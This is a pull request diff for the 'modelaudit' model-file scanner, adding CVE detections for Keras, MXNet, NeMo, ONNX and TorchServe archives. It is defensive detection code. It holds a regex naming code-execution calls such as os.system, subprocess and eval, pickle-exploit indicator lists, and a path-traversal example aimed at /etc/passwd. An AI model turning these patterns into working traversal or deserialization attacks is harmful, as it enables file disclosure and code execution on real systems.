### PR TITLE
fix: add CVE scanner coverage

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -89,6 +89,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Bug Fixes
 
+- add CVE-specific coverage for ONNX symlink traversal, Keras `get_file(extract=True)` archives, MXNet ReDoS operator names, NeMo archive/checkpoint exploits, and TorchServe MAR ZipSlip attribution
 - mark trailing bytes after NumPy object-array pickle payloads inconclusive without escalating to security findings
 - avoid CoreML nested parse failures on bounded-read truncation
 - mark incomplete sharded-model scans as inconclusive, ignore shard-name prefix matches, and skip caching explicit incomplete outcomes

--- a/modelaudit/config/explanations.py
+++ b/modelaudit/config/explanations.py
@@ -1037,6 +1037,32 @@ def get_cve_2025_12058_explanation(issue_type: str) -> str:
     )
 
 
+def get_cve_2025_12060_explanation(issue_type: str) -> str:
+    """Get explanation for CVE-2025-12060: Keras get_file archive extraction traversal.
+
+    CVE-2025-12060 (CVSS 8.8 HIGH): A crafted .keras archive can configure
+    keras.utils.get_file(extract=True) with a remote tar archive. During model
+    loading, affected Keras versions may extract traversal or symlink entries
+    outside the intended cache directory. Fixed in Keras 3.12.0.
+    """
+    explanations = {
+        "get_file_extract_tar": (
+            "CVE-2025-12060: The config.json references keras.utils.get_file with "
+            "extract=True and a remote tar-like archive URL. In affected Keras versions, "
+            "loading the model may download and extract attacker-controlled archive entries "
+            "that traverse outside the intended destination. Upgrade to Keras >= 3.12.0 "
+            "and reject untrusted models that fetch and extract remote archives."
+        ),
+    }
+
+    return _get_explanation_with_default(
+        explanations,
+        issue_type,
+        "CVE-2025-12060: keras.utils.get_file(extract=True) can extract remote tar archives "
+        "with traversal entries. Upgrade to Keras >= 3.12.0.",
+    )
+
+
 def get_cve_2025_1550_explanation(issue_type: str) -> str:
     """Get explanation for CVE-2025-1550: Keras safe_mode bypass via config.json module references.
 

--- a/modelaudit/scanners/keras_zip_scanner.py
+++ b/modelaudit/scanners/keras_zip_scanner.py
@@ -86,7 +86,7 @@ _DANGEROUS_CONFIG_MODULES = frozenset(
 _GET_FILE_PATTERN = re.compile(r"get_file", re.IGNORECASE)
 _URL_PATTERN = re.compile(r"https?://", re.IGNORECASE)
 _ARCHIVE_EXTRACT_URL_PATTERN = re.compile(
-    r"\.(?:tar|tgz|tbz2|txz|tar\.gz|tar\.bz2|tar\.xz)(?:[?#]|$)",
+    r"\.(?:tar|tgz|tbz2|txz|tar\.gz|tar\.bz2|tar\.xz|tar\.zst|tar\.lz|tar\.lz4|tar\.lzma)(?:[?#]|$)",
     re.IGNORECASE,
 )
 _URL_SCHEME_PATTERN = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://")
@@ -1137,7 +1137,15 @@ class KerasZipScanner(BaseScanner):
             return True
 
         kwargs = node.get("kwargs")
-        return isinstance(kwargs, dict) and kwargs.get("extract") is True
+        if isinstance(kwargs, dict) and kwargs.get("extract") is True:
+            return True
+
+        args = node.get("args")
+        if isinstance(args, list | tuple):
+            # keras.utils.get_file positional args: fname, origin, untar, ..., extract.
+            return (len(args) > 2 and args[2] is True) or (len(args) > 7 and args[7] is True)
+
+        return False
 
     def _check_unsafe_deserialization_bypass(self, model_config: Any, result: ScanResult) -> None:
         """Check for CVE-2025-9906: enable_unsafe_deserialization bypass in config.json.

--- a/modelaudit/scanners/keras_zip_scanner.py
+++ b/modelaudit/scanners/keras_zip_scanner.py
@@ -24,6 +24,7 @@ from ..config.explanations import (
     get_cve_2025_8747_explanation,
     get_cve_2025_9906_explanation,
     get_cve_2025_12058_explanation,
+    get_cve_2025_12060_explanation,
     get_cve_2025_49655_explanation,
     get_cve_2026_1669_explanation,
     get_pattern_explanation,
@@ -84,6 +85,10 @@ _DANGEROUS_CONFIG_MODULES = frozenset(
 # CVE-2025-8747: keras.utils.get_file used as gadget to download + execute files
 _GET_FILE_PATTERN = re.compile(r"get_file", re.IGNORECASE)
 _URL_PATTERN = re.compile(r"https?://", re.IGNORECASE)
+_ARCHIVE_EXTRACT_URL_PATTERN = re.compile(
+    r"\.(?:tar|tgz|tbz2|txz|tar\.gz|tar\.bz2|tar\.xz)(?:[?#]|$)",
+    re.IGNORECASE,
+)
 _URL_SCHEME_PATTERN = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://")
 _WINDOWS_ABSOLUTE_PATH_PATTERN = re.compile(r"^(?:[a-zA-Z]:[\\/]|\\\\)")
 _KERAS_CONFIG_ENTRY = "config.json"
@@ -405,6 +410,7 @@ class KerasZipScanner(BaseScanner):
                 # CVE-2025-9906 can be detected in any parsed JSON shape; the
                 # rest of the structured model scan requires a top-level object.
                 self._check_unsafe_deserialization_bypass(model_config, result)
+                self._check_get_file_archive_extraction(model_config, result)
                 self._check_get_file_gadget(model_config, result)
                 self._load_keras_metadata(zf, result)
 
@@ -1064,6 +1070,74 @@ class KerasZipScanner(BaseScanner):
                 why=get_cve_2025_8747_explanation("get_file_gadget"),
             )
             return
+
+    def _check_get_file_archive_extraction(self, model_config: Any, result: ScanResult) -> None:
+        """Check for CVE-2025-12060: get_file(extract=True) tar traversal risk."""
+        for context, node in self._iter_dict_nodes(model_config):
+            if self._is_primarily_documentation(context, node):
+                continue
+
+            direct_string_values: list[str] = []
+            url_candidate_values: list[str] = []
+            for key, value in node.items():
+                direct_string_values.extend(self._extract_string_literals(value))
+                key_lower = str(key).lower()
+                if key_lower in {"url", "origin", "args", "kwargs"}:
+                    url_candidate_values.extend(self._extract_string_literals(value, include_dict_values=True))
+
+            has_get_file = any(
+                _GET_FILE_PATTERN.fullmatch(value.strip()) is not None
+                or value.strip().lower().endswith(".get_file")
+                or "keras.utils.get_file" in value.strip().lower()
+                for value in direct_string_values
+            )
+            if not has_get_file or not self._node_has_get_file_extract_true(node):
+                continue
+
+            archive_urls = [
+                value
+                for value in url_candidate_values
+                if _URL_PATTERN.search(value) is not None and _ARCHIVE_EXTRACT_URL_PATTERN.search(value) is not None
+            ]
+            if not archive_urls:
+                continue
+
+            result.add_check(
+                name="CVE-2025-12060: get_file Archive Extraction Traversal",
+                passed=False,
+                message=(
+                    "CVE-2025-12060: config.json contains keras.utils.get_file with extract=True "
+                    "and a remote tar archive URL"
+                ),
+                severity=IssueSeverity.CRITICAL,
+                location=f"{self.current_file_path}/config.json",
+                details={
+                    "cve_id": "CVE-2025-12060",
+                    "context": context,
+                    "urls": archive_urls[:5],
+                    "cvss": 8.8,
+                    "cwe": "CWE-22",
+                    "description": (
+                        "keras.utils.get_file(extract=True) can extract attacker-controlled tar archives "
+                        "with traversal or symlink entries outside the intended destination."
+                    ),
+                    "affected_versions": "Keras < 3.12.0",
+                    "remediation": (
+                        "Upgrade Keras to >= 3.12.0 and reject configs that download and extract tar archives."
+                    ),
+                },
+                why=get_cve_2025_12060_explanation("get_file_extract_tar"),
+            )
+            return
+
+    @staticmethod
+    def _node_has_get_file_extract_true(node: dict[str, Any]) -> bool:
+        """Return True only for direct get_file extract=True argument positions."""
+        if node.get("extract") is True:
+            return True
+
+        kwargs = node.get("kwargs")
+        return isinstance(kwargs, dict) and kwargs.get("extract") is True
 
     def _check_unsafe_deserialization_bypass(self, model_config: Any, result: ScanResult) -> None:
         """Check for CVE-2025-9906: enable_unsafe_deserialization bypass in config.json.

--- a/modelaudit/scanners/mxnet_scanner.py
+++ b/modelaudit/scanners/mxnet_scanner.py
@@ -27,6 +27,10 @@ BASE64_BLOB_RE = re.compile(r"^[A-Za-z0-9+/=\s]+$")
 SUSPICIOUS_DECODED_PAYLOAD_RE = re.compile(
     r"(?i)(?:os\.system|subprocess\.(?:popen|run|call|check_output)|eval\(|exec\(|__import__|ctypes\.(?:cdll|windll)|dlopen\(|loadlibrary)"
 )
+MXNET_CVE_2022_24294_ID = "CVE-2022-24294"
+MXNET_CVE_2022_24294_MIN_LENGTH = 1024
+MXNET_CVE_2022_24294_MIN_META_CHARS = 128
+MXNET_CVE_2022_24294_META_CHARS = frozenset("<>()[]{}*+?|\\")
 
 # Keep this list conservative to avoid flagging normal graph attributes.
 LOAD_AFFECTING_ATTR_KEYS = frozenset(
@@ -310,6 +314,7 @@ class MXNetScanner(BaseScanner):
             )
 
         self._scan_graph_references(path, payload, result)
+        self._scan_operator_names_for_cve_2022_24294(path, payload, result)
         self._scan_graph_metadata_payloads(path, payload, result)
         return True
 
@@ -446,6 +451,84 @@ class MXNetScanner(BaseScanner):
                         "reference_type": reference_type,
                     },
                 )
+
+    def _scan_operator_names_for_cve_2022_24294(
+        self,
+        path: str,
+        payload: dict[str, Any],
+        result: ScanResult,
+    ) -> None:
+        """Detect pathological MXNet operator names associated with CVE-2022-24294."""
+        nodes = payload.get("nodes")
+        if not isinstance(nodes, list):
+            return
+
+        findings: list[dict[str, Any]] = []
+        for index, raw_node in enumerate(nodes):
+            if not isinstance(raw_node, dict):
+                continue
+
+            op_name = str(raw_node.get("op", "")).strip()
+            if not self._is_cve_2022_24294_operator_name(op_name):
+                continue
+
+            findings.append(
+                {
+                    "node_name": str(raw_node.get("name", f"node_{index}")),
+                    "op_name_preview": op_name[:160],
+                    "op_name_length": len(op_name),
+                    "metacharacter_count": sum(1 for char in op_name if char in MXNET_CVE_2022_24294_META_CHARS),
+                }
+            )
+
+        if not findings:
+            return
+
+        result.add_check(
+            name="CVE-2022-24294: MXNet Operator Name ReDoS",
+            passed=False,
+            message=(
+                "Detected MXNet operator name shape associated with CVE-2022-24294 "
+                f"({len(findings)} node{'s' if len(findings) != 1 else ''} affected)"
+            ),
+            severity=IssueSeverity.WARNING,
+            location=path,
+            details={
+                "cve_id": MXNET_CVE_2022_24294_ID,
+                "cvss": 7.5,
+                "cwe": "CWE-400",
+                "description": (
+                    "Apache MXNet versions before 1.9.1 used a vulnerable regular expression when loading "
+                    "models with specially crafted operator names, causing excessive resource consumption."
+                ),
+                "remediation": (
+                    "Upgrade MXNet to >= 1.9.1 and reject model graphs containing pathological operator names."
+                ),
+                "findings": findings[:10],
+                "finding_count": len(findings),
+            },
+            why=(
+                "The operator name is not merely long; it combines extreme length with a dense, regex-active "
+                "delimiter pattern that matches the CVE-2022-24294 denial-of-service risk class."
+            ),
+        )
+
+    @staticmethod
+    def _is_cve_2022_24294_operator_name(op_name: str) -> bool:
+        """Return True for pathological operator names, avoiding long benign names."""
+        if len(op_name) < MXNET_CVE_2022_24294_MIN_LENGTH:
+            return False
+
+        metacharacter_count = sum(1 for char in op_name if char in MXNET_CVE_2022_24294_META_CHARS)
+        if metacharacter_count < MXNET_CVE_2022_24294_MIN_META_CHARS:
+            return False
+
+        # Require repeated regex-active bracket/quantifier runs so long namespace-like
+        # custom operator names do not become noisy findings.
+        repeated_angle_runs = len(re.findall(r"(?:<[^<>]{0,64}){16,}", op_name))
+        repeated_group_runs = len(re.findall(r"(?:\([^()]{0,64}){16,}", op_name))
+        repeated_quantifier_runs = len(re.findall(r"[+*?]{16,}", op_name))
+        return (repeated_angle_runs + repeated_group_runs + repeated_quantifier_runs) > 0
 
     def _scan_graph_metadata_payloads(self, path: str, payload: dict[str, Any], result: ScanResult) -> None:
         seen_payloads: set[str] = set()

--- a/modelaudit/scanners/nemo_scanner.py
+++ b/modelaudit/scanners/nemo_scanner.py
@@ -9,8 +9,10 @@ import logging
 import os
 import re
 import tarfile
+import tempfile
 from typing import Any, ClassVar
 
+from ..utils import is_absolute_archive_path, sanitize_archive_path
 from .base import INCONCLUSIVE_SCAN_OUTCOME, BaseScanner, IssueSeverity, ScanResult
 
 try:
@@ -104,6 +106,8 @@ CVE_2025_23304_DESCRIPTION = (
 CVE_2025_23304_REMEDIATION = (
     "Update to NeMo >= 2.3.2 which validates _target_ values. Do not load untrusted .nemo files."
 )
+NEMO_CHECKPOINT_MEMBER_EXTENSIONS = frozenset({".ckpt", ".pt", ".pth", ".pkl", ".pickle"})
+NEMO_MAX_CHECKPOINT_SCAN_BYTES = 50 * 1024 * 1024
 
 _INCONCLUSIVE_METADATA_KEY = "scan_outcome"
 _INCONCLUSIVE_REASONS_METADATA_KEY = "scan_outcome_reasons"
@@ -232,6 +236,29 @@ class NemoScanner(BaseScanner):
             for member in tar:
                 self.check_interrupted()
 
+                temp_base = os.path.join(tempfile.gettempdir(), "extract_nemo")
+                resolved_member, member_path_safe = sanitize_archive_path(member.name, temp_base)
+                if not member_path_safe:
+                    self._add_archive_path_traversal_check(
+                        result,
+                        archive_path=path,
+                        entry=member.name,
+                        target=None,
+                    )
+                    continue
+
+                if member.issym() or member.islnk():
+                    target_base = os.path.dirname(resolved_member)
+                    _target_resolved, target_safe = sanitize_archive_path(member.linkname, target_base)
+                    if not target_safe:
+                        self._add_archive_path_traversal_check(
+                            result,
+                            archive_path=path,
+                            entry=member.name,
+                            target=member.linkname,
+                        )
+                    continue
+
                 if not member.isfile():
                     continue
 
@@ -307,6 +334,9 @@ class NemoScanner(BaseScanner):
                                 details={"config_file": member.name},
                             )
 
+                if name_lower.endswith(tuple(NEMO_CHECKPOINT_MEMBER_EXTENSIONS)):
+                    self._scan_checkpoint_member(tar, member, path, result)
+
         if yaml_configs_found == 0:
             message = (
                 "No YAML configuration found in NeMo archive"
@@ -327,6 +357,205 @@ class NemoScanner(BaseScanner):
                 message=f"Found {yaml_configs_found} YAML config(s)",
                 location=path,
             )
+
+    def _add_archive_path_traversal_check(
+        self,
+        result: ScanResult,
+        *,
+        archive_path: str,
+        entry: str,
+        target: str | None,
+    ) -> None:
+        """Report NeMo archive member paths that can escape extraction roots."""
+        path_value = target or entry
+        if is_absolute_archive_path(path_value):
+            cve_id = "CVE-2025-23250"
+            cvss = 7.6
+            cwe = "CWE-22"
+            description = (
+                "NVIDIA NeMo Framework archive loading can improperly limit absolute or out-of-root paths, "
+                "allowing arbitrary file writes from crafted model archives."
+            )
+            remediation = "Update NVIDIA NeMo Framework to release 25.02 or later and reject unsafe archive paths."
+        else:
+            cve_id = "CVE-2025-23360"
+            cvss = 7.1
+            cwe = "CWE-23"
+            description = (
+                "NVIDIA NeMo Framework archive loading can process relative path traversal entries, allowing "
+                "crafted model archives to write files outside the intended extraction directory."
+            )
+            remediation = "Update NVIDIA NeMo Framework to release 24.12 or later and reject relative traversal paths."
+
+        result.add_check(
+            name=f"{cve_id}: NeMo Archive Path Traversal",
+            passed=False,
+            message=(
+                f"{cve_id}: NeMo archive member '{entry}'"
+                + (f" links to unsafe target '{target}'" if target is not None else " escapes extraction root")
+            ),
+            severity=IssueSeverity.CRITICAL,
+            location=f"{archive_path}:{entry}",
+            details={
+                "entry": entry,
+                "target": target,
+                "cve_id": cve_id,
+                "cvss": cvss,
+                "cwe": cwe,
+                "description": description,
+                "remediation": remediation,
+            },
+            why=(
+                "The .nemo file is a tar archive. This member path would escape the intended extraction "
+                "directory in vulnerable NeMo loaders, creating an arbitrary file-write risk."
+            ),
+        )
+
+    def _scan_checkpoint_member(
+        self,
+        tar: tarfile.TarFile,
+        member: tarfile.TarInfo,
+        archive_path: str,
+        result: ScanResult,
+    ) -> None:
+        """Run existing nested scanners over small NeMo checkpoint members."""
+        max_scan_bytes = self._normalize_positive_int_config(
+            self.config.get("max_nemo_checkpoint_scan_bytes"),
+            NEMO_MAX_CHECKPOINT_SCAN_BYTES,
+        )
+        if member.size > max_scan_bytes:
+            result.add_check(
+                name="NeMo Checkpoint Nested Scan",
+                passed=True,
+                message=f"Skipped large checkpoint member: {member.name}",
+                location=f"{archive_path}:{member.name}",
+                details={
+                    "entry": member.name,
+                    "size_bytes": member.size,
+                    "max_scan_bytes": max_scan_bytes,
+                },
+            )
+            return
+
+        extracted_path = self._extract_member_to_tempfile(tar, member)
+        if extracted_path is None:
+            return
+
+        try:
+            from modelaudit.scanners import get_scanner_for_file
+
+            scanner = get_scanner_for_file(extracted_path, config=dict(self.config))
+            if scanner is None:
+                return
+
+            nested_result = scanner.scan(extracted_path)
+            critical_issues = [
+                issue
+                for issue in nested_result.issues
+                if issue.severity == IssueSeverity.CRITICAL and self._is_nested_checkpoint_deserialization_issue(issue)
+            ]
+            if critical_issues:
+                self._add_checkpoint_deserialization_check(
+                    result,
+                    archive_path=archive_path,
+                    entry=member.name,
+                    nested_scanner=nested_result.scanner_name,
+                    critical_issues=critical_issues,
+                )
+        finally:
+            try:
+                os.unlink(extracted_path)
+            except OSError:
+                logger.debug("Failed to remove temporary NeMo checkpoint scan file: %s", extracted_path)
+
+    @staticmethod
+    def _is_nested_checkpoint_deserialization_issue(issue: Any) -> bool:
+        details = issue.details if isinstance(issue.details, dict) else {}
+        text = " ".join(
+            str(part).lower()
+            for part in (
+                issue.message,
+                issue.type,
+                issue.rule_code,
+                details.get("cve_id", ""),
+                details.get("opcode", ""),
+                details.get("symbol", ""),
+                details.get("function", ""),
+            )
+        )
+        return any(
+            indicator in text
+            for indicator in (
+                "pickle",
+                "unpickle",
+                "deserial",
+                "opcode",
+                "global",
+                "reduce",
+                "torch.load",
+                "arbitrary code",
+                "cve-2020-13092",
+                "cve-2025-1716",
+                "cve-2025-32434",
+            )
+        )
+
+    @staticmethod
+    def _extract_member_to_tempfile(tar: tarfile.TarFile, member: tarfile.TarInfo) -> str | None:
+        member_file = tar.extractfile(member)
+        if member_file is None:
+            return None
+
+        _root, suffix = os.path.splitext(member.name)
+        with member_file, tempfile.NamedTemporaryFile(suffix=suffix or ".bin", delete=False) as temp_file:
+            while True:
+                chunk = member_file.read(64 * 1024)
+                if not chunk:
+                    break
+                temp_file.write(chunk)
+            return temp_file.name
+
+    def _add_checkpoint_deserialization_check(
+        self,
+        result: ScanResult,
+        *,
+        archive_path: str,
+        entry: str,
+        nested_scanner: str,
+        critical_issues: list[Any],
+    ) -> None:
+        result.add_check(
+            name="CVE-2025-23249: NeMo Checkpoint Unsafe Deserialization",
+            passed=False,
+            message=(
+                "CVE-2025-23249: NeMo checkpoint member contains unsafe deserialization payloads "
+                f"detected by {nested_scanner}"
+            ),
+            severity=IssueSeverity.CRITICAL,
+            location=f"{archive_path}:{entry}",
+            details={
+                "entry": entry,
+                "nested_scanner": nested_scanner,
+                "critical_issue_count": len(critical_issues),
+                "sample_issue_messages": [issue.message for issue in critical_issues[:3]],
+                "cve_id": "CVE-2025-23249",
+                "cvss": 7.6,
+                "cwe": "CWE-502",
+                "description": (
+                    "NVIDIA NeMo Framework contains unsafe deserialization paths for untrusted model data. "
+                    "A crafted checkpoint inside a .nemo archive can trigger code execution when loaded."
+                ),
+                "related_cves": ["CVE-2025-33253", "CVE-2026-24157"],
+                "remediation": (
+                    "Update NVIDIA NeMo Framework to release 25.02 or later, keep current with subsequent "
+                    "checkpoint-loading fixes, and reject untrusted checkpoint payloads."
+                ),
+            },
+            why=(
+                "A nested scanner found critical unsafe-deserialization behavior inside a checkpoint bundled "
+                "in the .nemo archive. Vulnerable NeMo loaders may deserialize these checkpoints during model load."
+            ),
+        )
 
     def _check_hydra_targets(
         self,

--- a/modelaudit/scanners/nemo_scanner.py
+++ b/modelaudit/scanners/nemo_scanner.py
@@ -247,6 +247,7 @@ class NemoScanner(BaseScanner):
                     )
                     continue
 
+                name_lower = member.name.lower()
                 if member.issym() or member.islnk():
                     target_base = os.path.dirname(resolved_member)
                     _target_resolved, target_safe = sanitize_archive_path(member.linkname, target_base)
@@ -257,12 +258,51 @@ class NemoScanner(BaseScanner):
                             entry=member.name,
                             target=member.linkname,
                         )
+                    elif name_lower.endswith(tuple(NEMO_CHECKPOINT_MEMBER_EXTENSIONS)):
+                        link_target_name = self._resolve_archive_link_member_name(member)
+                        if link_target_name is None:
+                            self._mark_inconclusive_scan_result(
+                                result,
+                                reason="nemo_checkpoint_link_target_unresolved",
+                                check_name="NeMo Checkpoint Nested Scan",
+                                message=f"Could not resolve checkpoint link target: {member.name}",
+                                location=f"{path}:{member.name}",
+                                details={"entry": member.name, "target": member.linkname},
+                            )
+                        else:
+                            try:
+                                target_member = tar.getmember(link_target_name)
+                            except KeyError:
+                                self._mark_inconclusive_scan_result(
+                                    result,
+                                    reason="nemo_checkpoint_link_target_missing",
+                                    check_name="NeMo Checkpoint Nested Scan",
+                                    message=f"Checkpoint link target not found: {member.name} -> {member.linkname}",
+                                    location=f"{path}:{member.name}",
+                                    details={"entry": member.name, "target": member.linkname},
+                                )
+                            else:
+                                if target_member.isfile():
+                                    self._scan_checkpoint_member(
+                                        tar,
+                                        target_member,
+                                        path,
+                                        result,
+                                        entry_name=member.name,
+                                    )
+                                else:
+                                    self._mark_inconclusive_scan_result(
+                                        result,
+                                        reason="nemo_checkpoint_link_target_not_file",
+                                        check_name="NeMo Checkpoint Nested Scan",
+                                        message=f"Checkpoint link target is not a regular file: {member.name}",
+                                        location=f"{path}:{member.name}",
+                                        details={"entry": member.name, "target": member.linkname},
+                                    )
                     continue
 
                 if not member.isfile():
                     continue
-
-                name_lower = member.name.lower()
 
                 # Check for suspicious files in the archive
                 if name_lower.endswith((".py", ".sh", ".bat", ".cmd", ".ps1")):
@@ -358,6 +398,19 @@ class NemoScanner(BaseScanner):
                 location=path,
             )
 
+    @staticmethod
+    def _resolve_archive_link_member_name(member: tarfile.TarInfo) -> str | None:
+        """Resolve a tar link target to a normalized archive member name."""
+        linkname = member.linkname.replace("\\", "/")
+        if is_absolute_archive_path(linkname):
+            return None
+
+        member_dir = os.path.dirname(member.name.replace("\\", "/"))
+        candidate = os.path.normpath(os.path.join(member_dir, linkname)).replace("\\", "/")
+        if candidate in {"", "."} or candidate == ".." or candidate.startswith("../"):
+            return None
+        return candidate.lstrip("./")
+
     def _add_archive_path_traversal_check(
         self,
         result: ScanResult,
@@ -417,28 +470,41 @@ class NemoScanner(BaseScanner):
         member: tarfile.TarInfo,
         archive_path: str,
         result: ScanResult,
+        *,
+        entry_name: str | None = None,
     ) -> None:
         """Run existing nested scanners over small NeMo checkpoint members."""
+        report_entry = entry_name or member.name
         max_scan_bytes = self._normalize_positive_int_config(
             self.config.get("max_nemo_checkpoint_scan_bytes"),
             NEMO_MAX_CHECKPOINT_SCAN_BYTES,
         )
         if member.size > max_scan_bytes:
-            result.add_check(
-                name="NeMo Checkpoint Nested Scan",
-                passed=True,
-                message=f"Skipped large checkpoint member: {member.name}",
-                location=f"{archive_path}:{member.name}",
+            self._mark_inconclusive_scan_result(
+                result,
+                reason="nemo_checkpoint_scan_skipped_size_limit",
+                check_name="NeMo Checkpoint Nested Scan",
+                message=f"Checkpoint member exceeds nested scan limit: {report_entry}",
+                location=f"{archive_path}:{report_entry}",
                 details={
-                    "entry": member.name,
+                    "entry": report_entry,
+                    "source_entry": member.name,
                     "size_bytes": member.size,
                     "max_scan_bytes": max_scan_bytes,
                 },
             )
             return
 
-        extracted_path = self._extract_member_to_tempfile(tar, member)
+        extracted_path = self._extract_member_to_tempfile(tar, member, suffix_source=report_entry)
         if extracted_path is None:
+            self._mark_inconclusive_scan_result(
+                result,
+                reason="nemo_checkpoint_extract_failed",
+                check_name="NeMo Checkpoint Nested Scan",
+                message=f"Could not extract checkpoint member for nested scan: {report_entry}",
+                location=f"{archive_path}:{report_entry}",
+                details={"entry": report_entry, "source_entry": member.name},
+            )
             return
 
         try:
@@ -446,9 +512,34 @@ class NemoScanner(BaseScanner):
 
             scanner = get_scanner_for_file(extracted_path, config=dict(self.config))
             if scanner is None:
+                self._mark_inconclusive_scan_result(
+                    result,
+                    reason="nemo_checkpoint_no_nested_scanner",
+                    check_name="NeMo Checkpoint Nested Scan",
+                    message=f"No nested scanner available for checkpoint member: {report_entry}",
+                    location=f"{archive_path}:{report_entry}",
+                    details={"entry": report_entry, "source_entry": member.name},
+                )
                 return
 
-            nested_result = scanner.scan(extracted_path)
+            try:
+                nested_result = scanner.scan(extracted_path)
+            except Exception as exc:
+                self._mark_inconclusive_scan_result(
+                    result,
+                    reason="nemo_checkpoint_nested_scan_failed",
+                    check_name="NeMo Checkpoint Nested Scan",
+                    message=f"Nested scan failed for checkpoint member {report_entry}: {exc!s}",
+                    location=f"{archive_path}:{report_entry}",
+                    details={
+                        "entry": report_entry,
+                        "source_entry": member.name,
+                        "nested_scanner": scanner.name,
+                        "exception_type": type(exc).__name__,
+                    },
+                )
+                return
+
             critical_issues = [
                 issue
                 for issue in nested_result.issues
@@ -458,7 +549,7 @@ class NemoScanner(BaseScanner):
                 self._add_checkpoint_deserialization_check(
                     result,
                     archive_path=archive_path,
-                    entry=member.name,
+                    entry=report_entry,
                     nested_scanner=nested_result.scanner_name,
                     critical_issues=critical_issues,
                 )
@@ -501,12 +592,17 @@ class NemoScanner(BaseScanner):
         )
 
     @staticmethod
-    def _extract_member_to_tempfile(tar: tarfile.TarFile, member: tarfile.TarInfo) -> str | None:
+    def _extract_member_to_tempfile(
+        tar: tarfile.TarFile,
+        member: tarfile.TarInfo,
+        *,
+        suffix_source: str | None = None,
+    ) -> str | None:
         member_file = tar.extractfile(member)
         if member_file is None:
             return None
 
-        _root, suffix = os.path.splitext(member.name)
+        _root, suffix = os.path.splitext(suffix_source or member.name)
         with member_file, tempfile.NamedTemporaryFile(suffix=suffix or ".bin", delete=False) as temp_file:
             while True:
                 chunk = member_file.read(64 * 1024)

--- a/modelaudit/scanners/onnx_scanner.py
+++ b/modelaudit/scanners/onnx_scanner.py
@@ -120,6 +120,28 @@ def _resolve_external_location(model_dir: Path, location: str) -> Path:
     return (model_dir / location).resolve()
 
 
+def _resolve_external_location_lexically(model_dir: Path, location: str) -> Path:
+    """Resolve an external_data location without following symlinks."""
+    if _is_windows_absolute_path(location):
+        return Path(location)
+    return Path(os.path.normpath(str(model_dir / location)))
+
+
+def _has_symlink_component(path: Path, root: Path) -> bool:
+    """Return True when any component from root to path is a symlink."""
+    try:
+        relative_parts = path.relative_to(root).parts
+    except ValueError:
+        return False
+
+    current = root
+    for part in relative_parts:
+        current = current / part
+        if current.is_symlink():
+            return True
+    return False
+
+
 def _tensor_data_type_to_np_dtype(data_type: int) -> Any:
     """Resolve an ONNX tensor dtype across current and legacy ONNX APIs."""
     import numpy as np
@@ -411,6 +433,7 @@ class OnnxScanner(BaseScanner):
                     )
                     continue
                 has_windows_absolute_path = _is_windows_absolute_path(location)
+                lexical_external_path = _resolve_external_location_lexically(model_dir, location)
                 external_path = _resolve_external_location(model_dir, location)
                 # CVE-2024-27318: Detect nested path traversal (e.g.
                 # "subdir/../../etc/passwd") which bypasses naive lstrip
@@ -418,8 +441,54 @@ class OnnxScanner(BaseScanner):
                 # the existence check so traversal attempts against
                 # non-existent targets are still flagged.
                 has_traversal_raw = ".." in location.replace("\\", "/").split("/")
+                lexical_in_model_dir = not has_windows_absolute_path and _is_contained_in(
+                    lexical_external_path, model_dir
+                )
+                has_symlink_component = lexical_in_model_dir and _has_symlink_component(
+                    lexical_external_path,
+                    model_dir,
+                )
+                symlink_escapes_model_dir = (
+                    has_symlink_component and external_path.exists() and not _is_contained_in(external_path, model_dir)
+                )
                 escapes_model_dir = has_windows_absolute_path or not _is_contained_in(external_path, model_dir)
-                if escapes_model_dir:
+                if symlink_escapes_model_dir:
+                    result.add_check(
+                        name="CVE-2026-34447: External Data Symlink Traversal",
+                        passed=False,
+                        message=(
+                            "CVE-2026-34447: External data path "
+                            f"'{location}' for tensor '{tensor.name}' resolves through a symlink outside "
+                            "the model directory"
+                        ),
+                        severity=IssueSeverity.CRITICAL,
+                        location=str(lexical_external_path),
+                        details={
+                            "tensor": tensor.name,
+                            "file": location,
+                            "symlink_path": str(lexical_external_path),
+                            "resolved_path": str(external_path),
+                            "cve_id": "CVE-2026-34447",
+                            "cvss": 5.5,
+                            "cwe": "CWE-22",
+                            "description": (
+                                "ONNX external_data loading can follow symlinks that escape the model "
+                                "directory and disclose local files."
+                            ),
+                            "remediation": (
+                                "Reject external_data entries that traverse symlinks outside the model "
+                                "directory and update ONNX to a version containing the symlink traversal fix."
+                            ),
+                        },
+                        why=(
+                            "The external_data location is lexically inside the model directory, but a symlink "
+                            "component resolves outside that directory. Loading external data may read a file "
+                            "the model archive should not be able to reference."
+                        ),
+                    )
+                elif has_symlink_component and not external_path.exists():
+                    missing_files.setdefault(location, []).append(tensor.name)
+                elif escapes_model_dir:
                     # Track for per-file CVE-2025-51480 (write direction) reporting
                     traversal_files.setdefault(location, []).append(tensor.name)
                     # Determine specific CVE attribution

--- a/modelaudit/scanners/onnx_scanner.py
+++ b/modelaudit/scanners/onnx_scanner.py
@@ -448,9 +448,7 @@ class OnnxScanner(BaseScanner):
                     lexical_external_path,
                     model_dir,
                 )
-                symlink_escapes_model_dir = (
-                    has_symlink_component and external_path.exists() and not _is_contained_in(external_path, model_dir)
-                )
+                symlink_escapes_model_dir = has_symlink_component and not _is_contained_in(external_path, model_dir)
                 escapes_model_dir = has_windows_absolute_path or not _is_contained_in(external_path, model_dir)
                 if symlink_escapes_model_dir:
                     result.add_check(

--- a/modelaudit/scanners/torchserve_mar_scanner.py
+++ b/modelaudit/scanners/torchserve_mar_scanner.py
@@ -1396,7 +1396,24 @@ class TorchServeMarScanner(BaseScanner):
                     message=f"Archive entry attempted path traversal outside extraction root: {member_name}",
                     severity=IssueSeverity.CRITICAL,
                     location=f"{archive_path}:{member_name}",
-                    details={"entry": member_name},
+                    details={
+                        "entry": member_name,
+                        "cve_id": "CVE-2023-48299",
+                        "cvss": 7.5,
+                        "cwe": "CWE-22",
+                        "description": (
+                            "TorchServe MAR archives with traversal entries can write files outside the "
+                            "intended extraction directory."
+                        ),
+                        "remediation": (
+                            "Upgrade TorchServe to a patched version and reject .mar archives containing "
+                            "absolute paths or parent-directory traversal."
+                        ),
+                    },
+                    why=(
+                        "CVE-2023-48299 is a ZipSlip-style TorchServe MAR extraction vulnerability. "
+                        "This archive member would escape the extraction root if extracted naively."
+                    ),
                 )
                 continue
 

--- a/tests/scanners/test_keras_zip_scanner.py
